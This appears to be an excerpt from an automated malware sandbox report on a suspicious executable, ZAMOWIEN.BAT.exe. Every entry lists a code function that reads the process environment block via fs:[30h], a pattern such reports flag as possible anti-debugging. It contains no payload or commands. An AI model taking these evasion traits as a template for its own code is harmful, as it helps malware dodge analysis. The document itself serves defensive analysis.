Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328872A0 mov eax, dword ptr fs:[00000030h]	4_2_328872A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]	4_2_328B92A6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]	4_2_328B92A6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]	4_2_328B92A6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B92A6 mov eax, dword ptr fs:[00000030h]	4_2_328B92A6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328792BC mov eax, dword ptr fs:[00000030h]	4_2_328792BC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328792BC mov eax, dword ptr fs:[00000030h]	4_2_328792BC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328792BC mov ecx, dword ptr fs:[00000030h]	4_2_328792BC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328792BC mov ecx, dword ptr fs:[00000030h]	4_2_328792BC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9240 mov eax, dword ptr fs:[00000030h]	4_2_327E9240
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9240 mov eax, dword ptr fs:[00000030h]	4_2_327E9240
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0 mov eax, dword ptr fs:[00000030h]	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F2D0 mov eax, dword ptr fs:[00000030h]	4_2_3281F2D0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F2D0 mov eax, dword ptr fs:[00000030h]	4_2_3281F2D0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED mov eax, dword ptr fs:[00000030h]	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C52E2 mov eax, dword ptr fs:[00000030h]	4_2_328C52E2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF2F8 mov eax, dword ptr fs:[00000030h]	4_2_328AF2F8
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B2F0 mov eax, dword ptr fs:[00000030h]	4_2_3289B2F0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B2F0 mov eax, dword ptr fs:[00000030h]	4_2_3289B2F0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E92FF mov eax, dword ptr fs:[00000030h]	4_2_327E92FF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32827208 mov eax, dword ptr fs:[00000030h]	4_2_32827208
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32827208 mov eax, dword ptr fs:[00000030h]	4_2_32827208
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C5227 mov eax, dword ptr fs:[00000030h]	4_2_328C5227
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB2D3 mov eax, dword ptr fs:[00000030h]	4_2_327EB2D3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB2D3 mov eax, dword ptr fs:[00000030h]	4_2_327EB2D3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB2D3 mov eax, dword ptr fs:[00000030h]	4_2_327EB2D3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F92C5 mov eax, dword ptr fs:[00000030h]	4_2_327F92C5
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F92C5 mov eax, dword ptr fs:[00000030h]	4_2_327F92C5
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282724D mov eax, dword ptr fs:[00000030h]	4_2_3282724D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AB256 mov eax, dword ptr fs:[00000030h]	4_2_328AB256
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AB256 mov eax, dword ptr fs:[00000030h]	4_2_328AB256
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BD26B mov eax, dword ptr fs:[00000030h]	4_2_328BD26B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BD26B mov eax, dword ptr fs:[00000030h]	4_2_328BD26B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32831270 mov eax, dword ptr fs:[00000030h]	4_2_32831270
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32831270 mov eax, dword ptr fs:[00000030h]	4_2_32831270
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32819274 mov eax, dword ptr fs:[00000030h]	4_2_32819274
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F7370 mov eax, dword ptr fs:[00000030h]	4_2_327F7370
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F7370 mov eax, dword ptr fs:[00000030h]	4_2_327F7370
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F7370 mov eax, dword ptr fs:[00000030h]	4_2_327F7370
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C539D mov eax, dword ptr fs:[00000030h]	4_2_328C539D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3284739A mov eax, dword ptr fs:[00000030h]	4_2_3284739A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3284739A mov eax, dword ptr fs:[00000030h]	4_2_3284739A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328233A0 mov eax, dword ptr fs:[00000030h]	4_2_328233A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328233A0 mov eax, dword ptr fs:[00000030h]	4_2_328233A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328133A5 mov eax, dword ptr fs:[00000030h]	4_2_328133A5
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9353 mov eax, dword ptr fs:[00000030h]	4_2_327E9353
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9353 mov eax, dword ptr fs:[00000030h]	4_2_327E9353
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328913B9 mov eax, dword ptr fs:[00000030h]	4_2_328913B9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328913B9 mov eax, dword ptr fs:[00000030h]	4_2_328913B9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328913B9 mov eax, dword ptr fs:[00000030h]	4_2_328913B9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327ED34C mov eax, dword ptr fs:[00000030h]	4_2_327ED34C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327ED34C mov eax, dword ptr fs:[00000030h]	4_2_327ED34C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E7330 mov eax, dword ptr fs:[00000030h]	4_2_327E7330
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AB3D0 mov ecx, dword ptr fs:[00000030h]	4_2_328AB3D0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF3E6 mov eax, dword ptr fs:[00000030h]	4_2_328AF3E6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C53FC mov eax, dword ptr fs:[00000030h]	4_2_328C53FC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287930B mov eax, dword ptr fs:[00000030h]	4_2_3287930B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287930B mov eax, dword ptr fs:[00000030h]	4_2_3287930B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287930B mov eax, dword ptr fs:[00000030h]	4_2_3287930B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B132D mov eax, dword ptr fs:[00000030h]	4_2_328B132D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B132D mov eax, dword ptr fs:[00000030h]	4_2_328B132D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F32A mov eax, dword ptr fs:[00000030h]	4_2_3281F32A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C5341 mov eax, dword ptr fs:[00000030h]	4_2_328C5341
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF367 mov eax, dword ptr fs:[00000030h]	4_2_328AF367
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32893370 mov eax, dword ptr fs:[00000030h]	4_2_32893370
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287D080 mov eax, dword ptr fs:[00000030h]	4_2_3287D080
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287D080 mov eax, dword ptr fs:[00000030h]	4_2_3287D080
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281D090 mov eax, dword ptr fs:[00000030h]	4_2_3281D090
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281D090 mov eax, dword ptr fs:[00000030h]	4_2_3281D090
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282909C mov eax, dword ptr fs:[00000030h]	4_2_3282909C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov ecx, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0 mov eax, dword ptr fs:[00000030h]	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3286D0C0 mov eax, dword ptr fs:[00000030h]	4_2_3286D0C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3286D0C0 mov eax, dword ptr fs:[00000030h]	4_2_3286D0C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C50D9 mov eax, dword ptr fs:[00000030h]	4_2_328C50D9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328190DB mov eax, dword ptr fs:[00000030h]	4_2_328190DB
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328150E4 mov eax, dword ptr fs:[00000030h]	4_2_328150E4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328150E4 mov ecx, dword ptr fs:[00000030h]	4_2_328150E4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]	4_2_328B903E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]	4_2_328B903E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]	4_2_328B903E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B903E mov eax, dword ptr fs:[00000030h]	4_2_328B903E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B052 mov eax, dword ptr fs:[00000030h]	4_2_3281B052
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289705E mov ebx, dword ptr fs:[00000030h]	4_2_3289705E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289705E mov eax, dword ptr fs:[00000030h]	4_2_3289705E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F5096 mov eax, dword ptr fs:[00000030h]	4_2_327F5096
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287106E mov eax, dword ptr fs:[00000030h]	4_2_3287106E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C5060 mov eax, dword ptr fs:[00000030h]	4_2_328C5060
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov ecx, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801070 mov eax, dword ptr fs:[00000030h]	4_2_32801070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327ED08D mov eax, dword ptr fs:[00000030h]	4_2_327ED08D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3286D070 mov ecx, dword ptr fs:[00000030h]	4_2_3286D070
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A5180 mov eax, dword ptr fs:[00000030h]	4_2_328A5180
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A5180 mov eax, dword ptr fs:[00000030h]	4_2_328A5180
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172 mov eax, dword ptr fs:[00000030h]	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32847190 mov eax, dword ptr fs:[00000030h]	4_2_32847190
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F7152 mov eax, dword ptr fs:[00000030h]	4_2_327F7152
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]	4_2_328A11A4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]	4_2_328A11A4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]	4_2_328A11A4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A11A4 mov eax, dword ptr fs:[00000030h]	4_2_328A11A4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280B1B0 mov eax, dword ptr fs:[00000030h]	4_2_3280B1B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]	4_2_327E9148
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]	4_2_327E9148
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]	4_2_327E9148
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9148 mov eax, dword ptr fs:[00000030h]	4_2_327E9148
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C51CB mov eax, dword ptr fs:[00000030h]	4_2_328C51CB
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]	4_2_327EB136
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]	4_2_327EB136
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]	4_2_327EB136
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB136 mov eax, dword ptr fs:[00000030h]	4_2_327EB136
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1131 mov eax, dword ptr fs:[00000030h]	4_2_327F1131
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1131 mov eax, dword ptr fs:[00000030h]	4_2_327F1131
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282D1D0 mov eax, dword ptr fs:[00000030h]	4_2_3282D1D0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282D1D0 mov ecx, dword ptr fs:[00000030h]	4_2_3282D1D0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C31E1 mov eax, dword ptr fs:[00000030h]	4_2_328C31E1
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328151EF mov eax, dword ptr fs:[00000030h]	4_2_328151EF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328971F9 mov esi, dword ptr fs:[00000030h]	4_2_328971F9
